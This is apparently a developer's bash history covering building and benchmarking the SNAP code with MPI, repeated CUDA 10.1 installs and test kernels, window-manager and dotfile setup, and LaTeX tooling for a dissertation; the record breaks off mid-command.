+make +make clean +make +ls +make clean +l +ls +make cleanout +ls +rm -f *.o +ls +make +make clean +ls +make all +ls +make clean +ls +make clean +ls +make +ls +make clean +l +gprof +make +gprof src/snap_mkl_vml --fi qasnap/sample/inp --fo snap_test.out +gprof src/snap_mkl_vml > test.out +gprof gmon.out +./src/snap_mkl_vml +./src/snap_mkl_vml --fi qasnap/sample/inp --fo test.out +./src/snap_mkl_vml --fi qasnap/sample/inp --fo test.out -np 4 +cat src/snap_mkl_vml +mpirun -np 4 src/snap_mkl_vml --fi qasnap/sample/inp --fo test.out +mpirun -np 16 src/snap_mkl_vml --fi qasnap/sample/inp --fo test.out +ls +cat gmon.out +gprof src/snap_mkl_vml +cat test.out +ls +rm snap_test.out +ls +source ~/.bashrc +ls +sudo apt-get install cuda +sudo dpkg -i cuda-repo-ubuntu1810_10.1.168-1_amd64.deb +sudo apt-get update +sudo apt-key adv --fetch-keyss/ubuntu1810/x86_64/7fa2af80.pub +sudo apt-get update +sudo apt-get install cuda +sudo apt-get install freeglut3 freeglut3-dev libxi-dev libxmu-dev +git cloneshort/msc_interim_report.git +git +git help -g +git config -h +git config --global user.name "Andrew Lamzed-Short" +git config --global user.email "a.lamzedshort@gmail.com" +nvcc -v +sudo apt install nvidia-cuda-toolkit +sudo apt-get update +sudo apt-get upgrade +ps aux | grep [a]pt +sudo apt-get upgrade +nvcc -v +sudo apt install nvidia-cuda-toolkit +sudo apt install nvidia-profiler nvidia-cuda-dev nvidia-visual-profiler nvidia-cuda-toolkit +sudo apt install -f nvidia-cuda-toolkit +apt-get install --help +sudo apt-get install nvidia-profiler nvidia-cuda-dev nvidia-visual-profiler nvidia-cuda-toolkit +sudo dpkg -i cuda-repo-ubuntu1810-10-1-local-10.1.168-418.67_1.0-1_amd64.deb +sudo apt-key add /var/cuda-repo-10-1-local-10.1.168-418.67/ +sudo apt-key add /var/cuda-repo-10-1-local-10.1.168-418.67/7fa2af80.pub +sudo apt-get update +sudo apt-get install cuda +nvcc -v +uname -m && cat /etc/*release +gcc -v +uname -r +sudo apt-get install linux-headers-$(uname -r) +sudo dpkg -i cuda-repo-ubuntu_19.04_x86_64.deb +sudo dpkg -i cuda-repo-ubuntu_18.04_x86_64.deb +nvcc +sudo apt install nvidia-cuda-toolkit +sudo apt install -f nvidia-cuda-toolkit +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install cuda +sudo add-apt-repository ppa:kgilmer/speed-ricer +sudo apt-get update +sudo apt-get install i3-wm +i3-gaps +i3 +sudo apt-get remove i3-wm +sudo apt install -y libxcb1-dev libxcb-keysyms1-dev libpango1.0-dev libxcb-util0-dev libxcb-icccm4-dev libyajl-dev libstartup-notification0-dev libxcb-randr0-dev libev-dev libxcb-cursor-dev libxcb-xinerama0-dev libxcb-xkb-dev libxkbcommon-dev libxkbcommon-x11-dev autoconf libxcb-xrm0 libxcb-xrm-dev automake +git clones +autorecond --force --install +sudo apt-get install autoreconf +ls +autoreconf --force --install +rm -rf build/ +mkdir -p build && cd build/ +../configure --prefix=/usr --sysconfdir=/etc --disable-sanitizers +make +sudo make install +i3 +ls -la +echo "exec i3" > xinit.rc +ls -la +mv xinit.rc .xinit.rc +startx +ls +ls -la +ls +mkdir i3 +touch config +vim config +nano config +sudo systemctl restart display-manager +startx +sudo apt-get install i3status dmenu i3lock xbacklight feh conky +sudo apt-get remove i3-gaps +ls +ls +ls +;s +ls +;s +ls +ls +ls bin +;s +ls +sudo apt-get install xterm +dmenu +dpkg -l | grep i3 +sudo apt install i3 +sudo apt install xinit +startz +startx +xev +i3 +ls +rm config +ls +i3 +sudo apt-get install vim +vim .config/i3/config +ls -la +i3-msg restart +sudo apt-get install feh +feh --bg-fill ~/.config/Wallpaper.jpg +feh --bg-scale ~/.config/Wallpaper.jpg +vim .config/i3/config +ls -la +touch .vimrc +vim .vimrc +vim .config/i3/config +i3 +i3-msg reload +vim .config/i3/config +i3-msg reload +vim .config/i3/config +i3-msg reload +vim .config/i3/config +i3-msg reload +ls -la +i3-msg reload +vim .config/i3/config +i3-msg reload +i3lock +vim .config/i3/config +sudo apt-get remove dmenu +sudo apt-get install rofi +vim .config/i3/config +i3-msg reload +vim .config/i3/config +which dmenu +sudo apt-get remove dmenu +sudo apt-get autoremove +dpkg -l +dpkg -l | grep dmenu +vim .config/i3/config +i3-msg reload +sudo apt-get install pkg-config libxcb1-dev libxcb1 libgl2ps-dev libx11-dev libglc0 libglc-dev libcairo2-dev libcairo-gobject2 libcairo2-dev libxkbfile-dev libxkbfile1 libxkbcommon-dev libxkbcommon-x11-dev libxcb-xkb-dev libxcb-dpms0-dev libxcb-damage0-dev libpam0g-dev libev-dev libxcb-image0-dev libxcb-util0-dev libxcb-composite0-dev libxcb-xinerama0-dev +mkdir ~/.config/bin +touch lock +vim lock +sudo apt-get install scrot imagemagick xautolock +chmod +x lock +./lock +man i3lock +clear +vim .config/i3/config +i3-msg reload +vim .config/i3/config +i3-msg reload +shutdown -h +shutdown -r now +ls -la .config +stty +cal +i3-msg reload +pavucontrol +sudo apt-get install pavucontrol +i3-msg reload +i3-msg restart +i3-sensible-terminal +tray-position = right +tray-detached = false +tray-background = ${root.background} +tray-offset-x = -4 +tray-offset-y = 0 +tray-maxsize = 16 +tray-padding = 2 +i3blocks-clock-term +sudo apt-get install i2blocks +sudo apt-get install i3blocks +i3-msg restart +i3blocks-update-term +i3blocks +i3-msg restart +killall polybar +pavucontrol +feh -h +man feh +i3-msg reload +sudo apt-get install cairo libxcb python2 xcb-proto xcb-util-image xcb-util-wm +sudo apt-get install polybar +polybar example +ls +mkdir polybar; cd polybar +touch config +;s +ls +sudo apt-get install xdotool +vim config +i3-msg reload +i3-msg restart +vim config +ls -la +vim .vimrc +vim .config/i3/config +i3-msg reload +MALLOC_CHECK=1 gnome-control-center +vim .config/i3/config +ls +ls +ls bin +mv bin scripts +l +s +vim volume_control.py +vim ../i3/config +xev +i3-msg restart +env XDG_CURRENT_DESKTOP=GNOME gnome-control-center +ls +vim pulse/daemon.conf +vim /etc/asound.conf +sudo vim /etc/asound.conf +pulseaudio -h +pulseaudio -k +vim i3/config +ls +ls -la +feh --bg-scale ~/.config/Wallpaper.jpg +vim i3/config +clear +clear +ls +ls +ls +git cloneshort/msc_dissertation.git +ls +ls +git status +code +nvcc +ls +cuda_10.1.168_418.67_linux(1).run +./cuda_10.1.168_418.67_linux(1).run +sh cuda_10.1.168_418.67_linux(1).run +ls -la +chmod +x cuda_10.1.168_418.67_linux(1).run +chmod +x "cuda_10.1.168_418.67_linux(1).run" +"cuda_10.1.168_418.67_linux(1).run" +./"cuda_10.1.168_418.67_linux(1).run" +cat /tmp/cuda-installer.log +sudo ./"cuda_10.1.168_418.67_linux(1).run" +cat /var/log/cuda-installer.log +sudo apt-get update +sudo apt-get upgrade +sudo apt-get autoremove +sudo zh "cuda_10.1.168_418.67_linux(1).run" +sudo sh "cuda_10.1.168_418.67_linux(1).run" +cat /var/log/cuda-installer.log +cat /var/log/nvidia-installer.log +sudo sh "cuda_10.1.168_418.67_linux(1).run" +cat /var/log/cuda-installer.log +shutdown -r now +vim .bashrc +source .bashrc +cat /var/log/cuda-installer.log +lsmod |grep nvidia.drm +sudo lsof |grep nvidia +sudo apt-get purge nvidia-cuda* +sudo apt-get purge nvidia-* +sudo service lightdm stop +ls +sudo sh "cuda_10.1.168_418.67_linux(1).run" +env XDG_CURRENT_DESKTOP=GNOME gnome-control-center +sudo sh "cuda_10.1.168_418.67_linux(1).run" +sudo sh "cuda_10.1.168_418.67_linux(1).run" --silent --driver +sudo service lightdm stop +sudo sh "cuda_10.1.168_418.67_linux(1).run" +cat /var/log/cuda-installer.log +sudo sh "cuda_10.1.168_418.67_linux(1).run" +nvcc +ls +vim cuda_test.c +mv cuda_test.c cuda_test.cu +vim cuda_test.cu +nvcc cuda_test.cu -o cuda_test +./cuda_test +vim cuda_test.cu +nvcc cuda_test.cu -o cuda_test +./cuda_test +nvprof ./cuda_test +echo $PATH +devcieQuery +deviceQuery +ls +ls +nvprof --help +clear +ls +ls -la +ls +ls -la +ls -la +ls +find . -name deviceQuery +s +ls +./deviceQuery +ls +make +sudo amke +sudo make +ls +./deviceQuery +sudo apt-get remove cuda* +sudo apt-get remove nvidia-* +sudo apt-get remove nvidia* +sudo apt-get autoremove +sudo sh "cuda_10.1.168_418.67_linux(1).run" +ls +nvprof ./cuda_test +ls +git status +git checkout -b cuda-separation +git status +make clean +make clean all +nvcc +which mpiicc +echo $PATH +cat ~/.bashrc +ls +ls -la +ls +ls -la +which icc +ls +ls +ls +ls intel64 +ls +. iccvars.sh +. intel.sh +make +source ~/.bashrc +make clean all +ls +mv snap_mkl_vml snap_mkl_vml-cpu +maek clean +make clean +ls -la +sudo cuda_10.1.168_418.67_linux.run +sudo sh "cuda_10.1.168_418.67_linux.run" +sudo apt-get update +sudo apt-get upgrade +sudo apt-get autoremove +sudo apt-get update +sudo apt-get upgrade +ls +. intel.sh +mpirun -n 4 src/snap_mkl_vml-cpu qasnap/center_src/in01 out01 +mpirun -np 4 src/snap_mkl_vml-cpu --fi qasnap/center_src/in01 --fo out01 +diff out01 qasnap/center_src/out01 +mpirun -np 4 src/snap_mkl_vml-cpu --fi qasnap/center_src/in01 --fo qasnap/centre_src/out01-local +mpirun -np 4 src/snap_mkl_vml-cpu --fi qasnap/center_src/in01 --fo qasnap/centre_src/out01_local +touch qasnap/center_src/out01-local +mpirun -np 4 src/snap_mkl_vml-cpu --fi qasnap/center_src/in01 --fo qasnap/centre_src/out01_local +mpirun -np 4 src/snap_mkl_vml-cpu --fi qasnap/center_src/in01 --fo out/out01 +mpirun -np 4 src/snap_mkl_vml-cpu --fi qasnap/center_src/in02 --fo out/out02 +mpirun -np 6 src/snap_mkl_vml-cpu --fi qasnap/center_src/in02 --fo out/out02 +ls -la +ls +./ OpenAudible_linux_1.5.2.sh +./OpenAudible_linux_1.5.2.sh +chmod +x OpenAudible_linux_1.5.2.sh +./OpenAudible_linux_1.5.2.sh +apt-get -h +apt-get clean +sudo apt-get clean +sudo apt-get update +man apt-get +sudo apt-get check +add-apt-repository -h +man add-apt-repository +sources.list +add-apt-repository sources.list +sudo add-apt-repository sources.list +cat /etc/apt/sources.list +history +sudo add-apt-repository remove ppa:kgilmer/speed-ricer +sudo add-apt-repository -h +sudo add-apt-repository --remove ppa:kgilmer/speed-ricer +man apt-key +apt-key list +sudo apt-get update +sudo apt-get upgrade +sudo apt-get autoremove +apt-get install default-jdk +sudo apt-get install default-jdk +which mpiicc +which mpicc +mpicc +nvcc +ls -r +man ls +tree +sudo apt-get install tree +tree +tree +tree > ./phone-tree.txt +tree > ~/phone-tree.txt +clear +ls +diff backup-tree.txt phone-tree.txt +diff -h +diff --help +diff -y backup-tree.txt phone-tree.txt +ls +ls -la +ls +tree > ~/backup-tree.txt +cat ~/backup-tree.txt +ls +python execute.py +python execute.py -h +. intel.sh +python execute.py +python execute.py --setup +sudo cp -r ~/.local/share/themes/Solarized-Dark-Shell/ /usr/share/themes/ +sudo apt-get install gtk2-engines-murrine gtk2-engines-pixbuf +wget -O mac-fonts.zipslab.com/data/Mac/macfonts.zip +sudo unzip mac-fonts.zip -d /usr/share/fonts; rm mac-fonts.zip +sudo fc-cache -f -v +nvcc -h +mpiicc -h +mpiicc --help +ls +ls +ls +ls | grep "libcuda" +sudo ln -s /usr/local/cuda/lib64/libcudart.so /usr/lib/libcudart.so +ls +which mpicc +man mpiicc +mpiicc --help +man nvcc +execute.py +which python +execute.py +./execute.py +chmod +x execute.py +./execute.py +./execute.py --clean +./execute.py +man nvcc +nvcc -h +make +make clean +make +make clean all +nvcc +nvcc -c sweep_cu.cu +nvcc -c dim3_sweep.cu +. ../intel.sh +nvcc -c dim3_sweep.cu +make setup +. ../intel.sh +echo $? +make setup +sudo make setup +ls -la .. +nvcc -c dim3_sweep.cu +make clean +nvcc -c dim3_sweep.cu +nvcc -c dim3_sweep_cuda.cu +make clean +make +make clean +make all +make clean +make all +make clean all +./../execute.py --setup +source ~/.bashrc +. ../intel.sh +make clean all +make clean +make all +make clean all +maek vars +make vars +make clean all +make dim3_sweep_cude.cu +make dim3_sweep_cude.o +make dim3_sweep_cuda.o +make clean +make dim3_sweep_cuda.o +make clean all +make clean +make all +make clean all +export LDFLAGS=-L/usr/local/cuda/lib64 +make clean +make +make clean +make +echo $LDFLAGS +make clean; make +clear +make clean; make +echo $? +make clean; make +.. +mpirun -h +mpirun -n 4 ./src/snap --fi qasnap/center_src/in01 --fo out/out01 +sudo apt-get install libimage-exiftool-perl +ls +exiftool -h +exiftool --help +exiftool -Title="The GNU Make Book" "The GNU Make Book.pdf" +ls -la +./execute.py --exe src/snap --fi qasnap/center_src/in01 --fo out/out01 +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in01 --fo out/out01 +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in02 --fo out/out02 +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in02 --fo out/out02 > out/out02_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in01 --fo out/out01 > out/out01_time.txt +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in03 --fo out/out03 > out/out03_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in04 --fo out/out04 > out/out04_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in05 --fo out/out05 > out/out05_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in06 --fo out/out06 > out/out06_time.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in07 --fo out/out07 > out/out07_time.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in08 --fo out/out08 > out/out08_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in09 --fo out/out09 > out/out09_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in10 --fo out/out10 > out/out10_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in11 --fo out/out11 > out/out11_time.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in12 --fo out/out12 > out/out12_time.txt +make clean +make all +make clean all +man make +make count +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in01 --fo out/out01_2 > out/out01_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in01 --fo out/out01_3 > out/out01_time_3.txt +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in02 --fo out/out02_2 > out/out02_time_2.txt +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in02 --fo out/out02_3 > out/out02_time_3.txt +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in03 --fo out/out03_2 > out/out03_time_2.txt +./execute.py --exe src/snap --np 6 --fi qasnap/center_src/in03 --fo out/out03_3 > out/out03_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in04 --fo out/out04_2 > out/out04_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in04 --fo out/out04_3 > out/out04_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in05 --fo out/out05_2 > out/out05_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in05 --fo out/out05_3 > out/out05_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in06 --fo out/out06_2 > out/out06_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in06 --fo out/out06_3 > out/out06_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in07 --fo out/out07_2 > out/out07_time_2.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in07 --fo out/out07_2 > out/out07_time_2.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in07 --fo out/out07_3 > out/out07_time_3.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in08 --fo out/out08_2 > out/out08_time_2.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in08 --fo out/out08_3 > out/out08_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in09 --fo out/out09_2 > out/out09_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in09 --fo out/out09_3 > out/out09_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in10 --fo out/out10_2 > out/out10_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in10 --fo out/out10_3 > out/out10_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in11 --fo out/out11_2 > out/out11_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in11 --fo out/out11_3 > out/out11_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in11 --fo out/out11_2 > out/out12_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in11 --fo out/out11_2 > out/out11_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in12 --fo out/out12_2 > out/out12_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in12 --fo out/out12_3 > out/out12_time_3.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in13 --fo out/out13_1 > out/out13_time_1.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in13 --fo out/out13_2 > out/out13_time_2.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in13 --fo out/out13_3 > out/out13_time_3.txt +./execute.py --exe src/snap --np 2 --fi qasnap/center_src/in14 --fo out/out14_1 > out/out14_time_1.txt +./execute.py --exe src/snap --np 4 --fi qasnap/center_src/in14 --fo out/out14_1 > out/out14_time_1.txt +./execute.py --exe src/snap --np 8 --fi qasnap/center_src/in14 --fo out/out14_1 > out/out14_time_1.txt +ls -la +execute.py --avg-times +./execute.py --avg-time +./execute.py --avg-times +./execute.py --avg_times +git remote -v +ls +ls -la +git pull +git status +git remote -v +ls +ls +git pull +sudo apt-get update +sudo apt-get upgrade +sudo apt-get autoremove +sudo apt-get install texlive-latex-recommended +text +tex +perl +sudo apt-get install perl-tk +pdftex --version +bibtex --version +sudo texhash +locate pdfgantt.sty +locate pgfgantt.sty +sudo apt-get install texlive-pictures +sudo apt-get install texlive-latex-recommended +sudo apt-get install texlive-latex-extra +texcount +sudo apt-get install texlive-extra-utils +texcount +texcount -h +texcount dissertation.tex +texcount ../msc_interim_report/interim_report.tex +;s +ls +open -h +which evince +man evince +sudo apt-get install awesome +startz +startx +mv .xinit.rc .xinitrc +ls -la +startx +sudo startx +vim .xinitrc +sudo startx +shtudown -r now +shutdown -r now +ls /usr/share/applications +sudo touch /usr/share/applications/awesome.desktop +vim /usr/share/applications/awesome.desktop +sudo vim /usr/share/applications/awesome.desktop +gconf-editor +sudo apt-get install gconf-editor +gnome-session +gnome-session -h +sudo vim /usr/share/xsessions/gnome-awesome.desktop +sudo vim /usr/share/gnome-session/awesome.session +mkdir .config +mkdir .config/awesome +cp /usr/share/awesome/themes/default/theme.lua .config/awesome +ls +ls +vim theme.lua +feh --bg-scale ~/Pictures/wallpaper.jpg +cp /etc/xdg/awesome/rc.lua . +ls -la +vim rc.lua +cp ~/Pictures/wallpaper.jpg . +mv aliases .aliases +echo 'awesome.restart()' | awesome-client +source .bashrc +reload +source .bashrc +reload +reload-wm +reload +ls +ls -lhFA | less +reload-wm +reload +mcd test +ls +.. +rmdir test +ls +reload-wm +echo 'awesome.restart()' | awesome-client +reload-wm +sudo apt-get install redshift +redshift +ping google.com +ping +sudo apt-get install artha +man artha +make +./snap_cpu --fi ../qasnap/center_src/in01 --fo test.out +./snap_cpu -n 4 --fi ../qasnap/center_src/in01 --fo test.out +mpirun -np 4 ./snap_cpu --fi ../qasnap/center_src/in01 --fo test.out +which mpirun +sudo sh cuda_10.1.168_418.67_linux.run +cat /var/log/cuda-installer.log +sudo apt-get autoremove +sudo sh cuda_10.1.168_418.67_linux.run +sudo apt-get autoremove +cat /var/log/cuda-installer.log +sudo sh cuda_10.1.168_418.67_linux.run +cat /var/log/cuda-installer.log +make clean +make all +.. +diff out01_1 out01_2 +diff -y out01_1 out01_2 +.. +make clean all +hunspell +sudo apt-get install hunspell +hunspell +hunspell -D +ls +ls +mcd Dictionaries +ls +ls +sudo sh cuda_10.1.168_418.67_linux.run +cat /var/log/cuda-installer.log +sudo sh cuda_10.1.168_418.67_linux.run +cat /var/log/cuda-installer.log +cat /var/log/nvidia-installer.log +ls +git status +git merge cuda-separation +git status +git push +ls +nvcc test.cu +ls +nvcc -c test.cu +ls +nvcc -c test.cu -o test +ls +./test +chmod +x test +./test +ls +ls -la +./test +sudo ./test +which nvcc +ls +sudo sh cuda_10.1.168_418.67_linux.run +sudo ldconfig +cat /etc/ld.so.conf +ls +,. +.. +nvcc -c test.cu -o test +./test +chmod +x test +./test +echo $PATH +echo $LD_LIBRARYPATH +echo $LD_LIBRARY_PATH +ls +vim .bashrc +. ~/.bashrc +ls +./test +nvcc -c test.cu -o test +./test +chmod +x test; ./test +./test +cat ~/.bashrc +echo $PATH +export PATH=/usr/local/cuda/bin:$PATH +./test +rm test +ls +nvcc -dc -arch=sm_60 -dlink -m64 -rdc=true -c test.cu -o test +chmod +x test; ./test +file /usr/local/cuda-10.1/bin/nvcc +cuda-uninstaller +sudo cuda-uninstaller +ls /usr/local/cuda-10.1/bin +./usr/local/cuda-10.1/bin/cuda-uninstaller +./cuda-uninstaller +sudo ./cuda-uninstaller +ls +sudo sh cuda_10.1.168_418.67_linux.run +echo $PATH +.. +ls +rm test.* +ls +rm a.out +ls +nvcc -c test.cu -o test +ls +chmod +x test +./test +sudo sh ~/Downloads/cuda_10.1.168_418.67_linux.run +ls ~ +ls +make +ls +ls +ls +make +ls +./deviceQuery +nvcc -m64 -ccbin g++ -o test.o -c test.cu +ls +./test +nvcc -m64 -ccbin g++ -gencode arch=compute_60,code=sm_60 -o test.o -c test.cu +./test +nvcc -ccbin g++ -m64 -gencode arch=compute_60,code=sm_60 -o test.o -c test.cu +./test +nvcc -ccbin g++ -m64 -gencode arch=compute_60,code=sm_60 -o test test.o +./test +cat ~/.bashrc +man gprof +git config --global credential.helper cache +git config --global credential.helper 'cache --timeout=36000' +python -v +python3 --version +man nvcc +ls +ls -la +ls /media +ls /media/andy +ls /media/andy/MAGELLAN/ +ls +ls +ls +clear +ls +nvcc -c add_loop_gpu.cu +ls +nvcc -o add_loop_gpu.o loop +nvcc loop -o add_loop_gpu.o +ls +./add_loop_gpu.o +chmod +x add_loop_gpu.o +./add_loop_gpu.o +nvcc add_loop_gpu.o +ls +./a.out +ls -la +chmod +x a.out +ls -la +man cp +cp chapter04/ ~ +cp -r chapter04/ ~ +ls ~ +./a.out +chmod +x a.out +ls +ls -la +./a.out +sudo sh cuda_10.1.168_418.67_linux.run +cat /var/log/cuda-installer.log +python test.py run --cpu -n 4 -i qasnap/center_src/in01 +python -v +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +mpirun +. intel.sh +mpirun +python 3 test.py setup +python3 test.py setup +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py clean +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py run --cpu -n 4 -i qasnap/center_src/in02 +mpirun -np 4 src/snap_cpu --fi in04 +mpirun -np 4 src/snap_cpu --fi qasnap/center_src/in04 --fo /tmp/out04 +mpirun -np 4 src/snap_cpu --fi qasnap/center_src/in02 --fo /tmp/out02 +echo $? +which python +python3 test.py run --cpu -n 4 -i qasnap/center_src/in02 +echo $? +python3 test.py run --cpu -n 4 -i qasnap/center_src/in02 +python3 test.py clean +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py clean +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py run --cpu -n 4 -i qasnap/center_src/in02 +python3 test.py run --cpu -n 6 -i qasnap/center_src/in02 +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py run --cpu -n 6 -i qasnap/center_src/in02 +python3 test.py run --cpu -n 6 -i qasnap/center_src/in02 --clean +python3 test.py analyse +python3 test.py clean +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 --clean +python +python3 +python 3 +python3 +python3 test.py analyse +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +. intel.sh +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py analyse +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py run --cpu -n 6 -i qasnap/center_src/in02 +python3 test.py analyse +python3 test.py clean +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 +python3 test.py run --cpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --cpu -n 6 -i qasnap/center_src/in02 --clean +python3 test.py analyse -v +python3 test.py -v analyse +python3 test.py analyse -v +python3 test.py -v analyse +python3 +python3 test.py -v analyse +python3 test.py -v average -i in01 -n 4 --cpu --blocks 0 --threads 0 +python3 test.py average -i in01 -n 4 --cpu --blocks 0 --threads 0 +python3 test.py average -i in01 -n 4 --cpu --blocks 0 --threads 1 +python3 test.py average -i in01 -n 4 --cpu --blocks 0 --threads 0 +python3 test.py compare -f1 out01_cpu_n4_1 -f2 out01_cpu_n4_2 +python3 test.py compare -f1 out01_cpu_n4_1 -f2 out02_cpu_n6_1 +python3 test.py compare -f1 out01_cpu_n4_1 -f2 out01_cpu_n4_2 +python3 test.py clean +make clean +make clean +.. +git merge feature/timing +git merge -h +git branch -d feature/timing +git branch -d cuda-separation +git status +make +make clean all +python 3 ../test.py run --gpu -n 4 -i ../qasnap/center_src/in01 +python3 ../test.py run --gpu -n 4 -i ../qasnap/center_src/in01 +.. +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +make clean all +.. +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +./a.out +;s +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +. intel.sh +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +make clean +.. +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +python3 test.py run setup +python3 test.py setup +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +. intel.sh +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +make all +. +.. +python3 test.py run --gpu -n 4 -i qasnap/center_src/in01 --clean +git merge feature/cuda-poc +git branch -d feature/cuda-poc +git log --pretty=format:"%h %s" --graph +ls +ls -la +mkdir .dotfiles +cp .bashrc .dotfiles/ +cp .functions .dotfiles/ +cp .aliases .dotfiles/ +cp .vimrc .dotfiles/ +cp .viminfo .dotfiles/ +cp .profile .dotfiles/ +cp .gitconfig .dotfiles/ +cp .fehbg .dotfiles/ +cat .bash_logout +cp .bash_logout .dotfiles/ +ls .dotfiles +ls -la .dotfiles +ll +sudo apt-get install stow +ls -la +mkdir .dotfiles +ls +ls -la +stow vim +mkdir vim +mkdir bash +mv .dotfiles .dots +ls +cp .vimrc .dots/vim +cp .viminfo .dots/vim +stow vim +stow vim +rm ~/.vimrc ~/.viminfo +stow vim +ls -la ~ +cp ~/.bashrc bash/ +cp ~/.bash_logout bash/ +cp ~/.profile bash/ +cp ~/.functions bash/ +cp ~/.aliases bash/ +rm -i ~/.bashrc ~/.functions ~/.aliases ~/.profile ~/.bash_logout +ls +ls bash +ls -l bash +ls -a bash +stow bash +ls +apt-get -h +echo stow > packages.txt +ls +cat packages.txt +ls -la ~ +mv ~/.bash_history bash +stow bash +cat bash/.bash_history +which shell +which bash +vim packages.txt +clear +ls +mkdir git +mv ~/.gitconfig git +stow git +ls +ls ~ +ls -a ~ +ls -la ~ +cat ~/.viminfo +ls -la vim +stow vim +rm ~/.viminfo +stow vim +ll ~ +reload +cat bash/.aliases +vim bash/.aliases +cat bash/.aliases +ls +ls -la +mv test.py test +chmod a+x test +mv test.py test +ls -la +./test setup +. intel.sh +cat .bashrc +cat ~/.bashrc +vim ~/.bashrc +reload +ls -la ~ +make clean all +.. +./test run -i in01 -n 4 +./test run -i in01 -n 4 --cpu +./test run -i qasnap/center_src/in01 -n 4 --cpu +./test run -i qasnap/center_src/in01 -n 4 --gpu +man diff +ls -la +diff -s .vimrc .vimrc +diff -s -y .vimrc .vimrc +ls .dots/vim +ll .dots/vim +rm .viminfo +stow vim +ll ~ +./test clean +./test run -i qasnap/center_src/in01 -n 4 --clean +./test run -i qasnap/center_src/in01 -n 4 --cpu --clean +./test run -i qasnap/center_src/in02 -n 6 --cpu --clean +./test run -i qasnap/center_src/in03 -n 6 --cpu --clean +./test run -i qasnap/center_src/in01 -n 4 --cpu --clean +./test run -i qasnap/center_src/in02 -n 6 --cpu --clean +./test run -i qasnap/center_src/in03 -n 6 --cpu --clean +./test run -i qasnap/center_src/in04 -n 4 --cpu --clean +./test run -i qasnap/center_src/in05 -n 4 --cpu --clean +./test run 